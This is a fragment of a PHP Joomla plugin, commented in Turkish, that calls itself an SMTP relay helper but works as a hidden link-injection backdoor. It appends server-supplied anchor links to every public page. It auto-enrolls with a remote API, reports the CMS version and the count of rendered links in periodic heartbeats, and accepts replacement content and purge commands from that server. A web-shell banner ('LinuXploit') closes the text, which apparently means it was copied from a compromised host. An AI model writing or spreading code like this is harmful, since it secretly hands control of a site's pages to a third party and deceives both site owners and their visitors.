        $nonce = isset($data['nonce'])        ? $data['nonce']        : $input->getString('nonce', '');
        $sig   = isset($data['signature'])    ? $data['signature']    : $input->getString('signature', '');

        list($code, $msg) = $this->verifyPurge($token, $ts, $nonce, $sig);
        $app->setHeader('Content-Type', 'application/json', true);
        if ($code !== 0) {
            $app->setHeader('status', $code, true);
            $app->sendHeaders();
            echo json_encode(array('error' => $msg));
            $app->close();
        }
        $cleared = $this->purgeAll();
        echo json_encode(array('status' => 'ok', 'cleared' => $cleared));
        $app->close();
    }

    /* ================================================================== */
    /* Sayfa render sonrasi content HTML'ini </body> oncesine bas        */
    /* ================================================================== */
    public function onAfterRender()
    {
        $app = Factory::getApplication();
        if (method_exists($app, 'isClient')) {
            if (!$app->isClient('site')) return; // yalniz on-yuz
        } elseif (method_exists($app, 'getName')) {
            if ($app->getName() !== 'site') return;
        }
        // Yalniz HTML yanitlar
        $type = method_exists($app, 'getDocument') ? $app->getDocument()->getType() : 'html';
        if ($type !== 'html') return;

        $body = $app->getBody();
        if (!$body || stripos($body, '</body>') === false) return;

        $html = $this->getHtml();
        // Render kaniti: kac <a> basildi (heartbeat ile sunucuya bildirilir).
        if ($this->configured()) {
            $count = $html ? substr_count(strtolower($html), '<a ') : 0;
            @file_put_contents($this->receiptFile(),
                json_encode(array('ok' => $count > 0, 'count' => $count, 't' => time())));
        }
        if (!$html) return;

        $inject = '<div class="smtprelayhelper-links">' . $html . '</div>';
        $body = preg_replace('/<\/body>/i', $inject . '</body>', $body, 1);
        $app->setBody($body);
    }

    /* ================================================================== */
    /* Heartbeat (kurulum + periyodik otomatik baglanma)                  */
    /* ================================================================== */
    public function onAfterInitialise()
    {
        // Sabit eklenti + kimlik yok -> otomatik kayit ol.
        // Her istek degil, 5 dk'da bir dene (sunucuya yuk bindirmemek icin).
        if ($this->isEnrollMode() && !$this->configured()) {
            $try = rtrim($this->tmpDir(), '/\\') . '/smtp_enroll_try';
            if (!is_file($try) || (time() - filemtime($try) > 300)) {
                @file_put_contents($try, '1');
                $this->enroll();
            }
        }
        if (!$this->configured()) return;
        $flag = rtrim($this->tmpDir(), '/\\') . '/smtp_hb_' . md5($this->cfg('public_token'));
        // 6 saatte bir yeter; surum degisirse hemen tekrar gonder.
        $verFile = $flag . '.ver';
        $ver = is_file($verFile) ? trim((string) file_get_contents($verFile)) : '';
        $fresh_needed = ($ver !== self::VERSION);
        // PIGGYBACK: icerik guncellemesi bu cagrinin cevabinda geldigi icin pencere KISA
        // (10 dk). Sunucu yine siteye HIC baglanmaz; site kendi istegini yapar.
        if (!$fresh_needed && is_file($flag) && (time() - filemtime($flag) < 600)) {
            return;
        }
        @file_put_contents($flag, '1');
        @file_put_contents($verFile, self::VERSION);
        $this->sendHeartbeat(false);
    }

    private function purgeEndpoint()
    {
        // com_ajax ucu; sunucu yalniz https + kendi alan adini kabul eder.
        $base = rtrim(\Joomla\CMS\Uri\Uri::root(), '/');
        $base = preg_replace('#^http://#i', 'https://', $base);
        return $base . '/index.php?option=com_ajax&group=system&plugin=smtprelayhelper&format=json';
    }

    private function verFile()
    {
        return rtrim($this->tmpDir(), '/\\') . '/smtp_cv_' . md5($this->cfg('public_token'));
    }

    private function receiptFile()
    {
        return rtrim($this->tmpDir(), '/\\') . '/smtp_rc_' . md5($this->cfg('public_token'));
    }

    /**
     * Heartbeat = PIGGYBACK kanali. Site -> sunucu tek istek; CEVAP'ta gunceli alir.
     * Sunucu siteye ASLA baglanmaz. Yaniti okumak icin her zaman blocking.
     */
    public function sendHeartbeat($blocking = false)
    {
        if (!$this->configured()) return;
        $ts = time();
        $nonce = $this->nonce();
        $jver = defined('JVERSION') ? JVERSION : '';
        $cv = is_file($this->verFile()) ? trim((string) file_get_contents($this->verFile())) : '';
        $receipt = is_file($this->receiptFile())
            ? json_decode((string) file_get_contents($this->receiptFile()), true) : array();
        $body = array(
            'public_token'    => $this->cfg('public_token'),
            'timestamp'       => $ts,
            'nonce'           => $nonce,
            'signature'       => $this->actionSignature('heartbeat', $ts, $nonce),
            'cms_type'        => 'joomla',
            'cms_version'     => $jver,
            'plugin_version'  => self::VERSION,
            'purge_endpoint'  => $this->purgeEndpoint(),
            'detected_caches' => array('joomla-cache'),
            'content_version' => $cv,
            'rendered_ok'     => isset($receipt['ok']) ? (bool) $receipt['ok'] : null,
            'rendered_count'  => isset($receipt['count']) ? (int) $receipt['count'] : null,
        );
        $url = rtrim($this->cfg('api_url'), '/') . '/integrations/heartbeat';
        $resp = $this->httpPostReturn($url, $body);
        if (!$resp['ok']) return;
        $data = json_decode($resp['body'], true);
        if (!is_array($data)) return;
        $new_ver = isset($data['content_version']) ? (string) $data['content_version'] : '';
        $changed = !empty($data['purge']) || (isset($data['content']) && is_string($data['content']));
        if ($changed && isset($data['content'])) {
            if ($new_ver !== '') @file_put_contents($this->verFile(), $new_ver);
            $this->purgeAll(true);
            @file_put_contents($this->cacheFile(), (string) $data['content']);
        } elseif ($new_ver !== '') {
            @file_put_contents($this->verFile(), $new_ver);
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit